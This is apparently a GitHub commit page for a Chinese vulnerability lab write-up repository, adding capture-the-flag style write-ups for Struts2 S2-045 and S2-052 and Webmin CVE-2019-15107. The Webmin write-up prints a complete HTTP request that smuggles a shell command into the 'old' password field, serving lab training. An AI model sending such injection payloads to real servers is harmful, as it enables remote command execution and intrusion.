Skip to content

Commit

Permalink
change some file
Browse files Browse the repository at this point in the history
  • Loading branch information
xxxxbxxxxx committed Aug 25, 2020
1 parent 6237d58 commit 0af4309
Show file tree
Hide file tree
Showing 18 changed files with 85 additions and 8 deletions.
5 changes: 5 additions & 0 deletions _sidebar.md
Original file line number Diff line number Diff line change
Expand Up @@ -58,6 +58,11 @@
* [Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar](writeup/Spring_Cloud_Config_Server_目录遍历漏洞_Frivolous-scholar/Spring_Cloud_Config_Server_目录遍历漏洞.md)
* [weblogic命令执行 CVE-2020-2551](writeup/weblogic命令执行_CVE-2020-2551_xiajibaxie/CVE-2020-2551.md)
* [Jupyter_Notebook_未授权访问漏洞](writeup/Jupyter_Notebook_未授权访问漏洞_xiajibax/JupyterNotebook未授权访问漏洞.md)
* [webmin远程命令执行漏洞(CVE-2019-15107)](writeup/webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/README.md)
* [thinkphp_5.0.21命令执行](writeup/thinkphp_5.0.21命令执行_hu4wufu/thinkphp_5.0.21命令执行.md)
* [ThinkPHP5远程代码执行漏洞(CNVD-2018-24942)](writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/README.md)
* [struts2-045(CVE-2017-5638)](writeup/struts2-045_CVE-2017-5638_hu4wufu/README.md)
* [struts2-052(CVE-2017-9805)](writeup/struts2-052_CVE-2017-9805_hu4wufu/README.md)


* 镜像
Expand Down
5 changes: 0 additions & 5 deletions writeup/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -112,8 +112,6 @@

[Jupyter_Notebook_未授权访问漏洞 by ](./Jupyter_Notebook_未授权访问漏洞_xiajibax/JupyterNotebook未授权访问漏洞.md)[xiajibaxie](https://github.com/xiajibaxie)

<<<<<<< HEAD
=======
[webmin远程命令执行漏洞(CVE-2019-15107)](./webmin远程命令执行漏洞_CVE-2019-15107_hu4wufu/README.md) by [hu4wufu](https://github.com/hu4wufu)

[thinkphp_5.0.21命令执行](./thinkphp_5.0.21命令执行_hu4wufu/thinkphp_5.0.21命令执行.md) by [hu4wufu](https://github.com/hu4wufu)
Expand All @@ -124,6 +122,3 @@

[struts2-052(CVE-2017-9805)](./struts2-052_CVE-2017-9805_hu4wufu/README.md) by [hu4wufu](https://github.com/hu4wufu)



>>>>>>> dea51cfa168a298eb8bf91572b93d783bb22c95f
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
3 changes: 0 additions & 3 deletions writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/README.md
100755 → 100644
Original file line number Diff line number Diff line change
Expand Up @@ -23,7 +23,4 @@ ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名

![2](./2.png)

## 参考链接

https://github.com/fofapro/vulfocus/blob/master/writeup/CNVD-2018-24942/CNVD-2018-24942.md

Binary file not shown.
Binary file added writeup/struts2-045_CVE-2017-5638_hu4wufu/1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
21 changes: 21 additions & 0 deletions writeup/struts2-045_CVE-2017-5638_hu4wufu/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,21 @@
# struts2-045(CVE-2017-5638)by [hu4wufu](https://github.com/hu4wufu)

## 漏洞描述

Struts2 存在远程代码执行的严重漏洞; 目前 Struts2 官方已经确认漏洞(漏洞编号 S2-045 , CVE 编号: CVE-2017-5638 ),并定级为高风险。

## 影响版本

- Struts 2.3.5 – Struts 2.3.31
- Struts 2.5 – Struts 2.5.10

## 利用流程

访问地址: `10.10.11.20:31433`

名称:vulfocus/struts-045

使用Struts2全版本漏洞测试工具获取 flag 成功

![1](./1.png)

Binary file added writeup/struts2-052_CVE-2017-9805_hu4wufu/1.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added writeup/struts2-052_CVE-2017-9805_hu4wufu/52.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
16 changes: 16 additions & 0 deletions writeup/struts2-052_CVE-2017-9805_hu4wufu/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
# struts2-052(CVE-2017-9805)by [hu4wufu](https://github.com/hu4wufu)

## 漏洞描述

2017年9月5日,Apache Struts 官方发布最新的安全公告称,Apache Struts 2.5.x 的 REST 插件存在远程代码执行高危漏洞,漏洞编号为 CVE-2017-9805(S2-052),攻击者可以通过构造恶意 XML 请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用 XStreamHandler 反序列化 XStream 实例的时候没有执行严格的过滤导致远程代码执行。

## 影响版本

Struts 2.5 - Struts 2.5.12

## 利用流程

使用Struts2全版本漏洞测试工具获取 flag 成功

![52](./52.png)

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Empty file.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
# Webmin远程命令执行漏洞(CVE-2019-15107)by [hu4wufu](https://github.com/hu4wufu)

## 概述

Webmin 被爆出1.920版本之前存在一个远程命令执行漏洞(CVE-2019-15107),当用户开 Webmin 密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统 Shell。由于Webmin 中 Password_Change.cgi 在接收请求的处理过程中,old 参数存在命令注入漏洞,可被攻击者恶意利用。

## 影响版本

Webmin 1.920及以下版本。

## 漏洞复现

1、打开靶场,开启Webmin的漏洞环境。

![image-20200821155246605](./1.png)

2、抓取数据包,修改数据,利用poc进行验证,发现有回显。

![image-20200821155231196](./2.png)

```
POST /password_change.cgi HTTP/1.1
Host: 118.193.36.37:9211
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://118.193.36.37:9211
Connection: close
Referer: https://118.193.36.37:9211/
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1
user=rootxx&pam=&expired=2&old=test|ls /tmp&new1=test2&new2=test2
```

3、直接查看FLag

![image-20200821155159221](./3.png)

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit 0af4309

Please sign in to comment.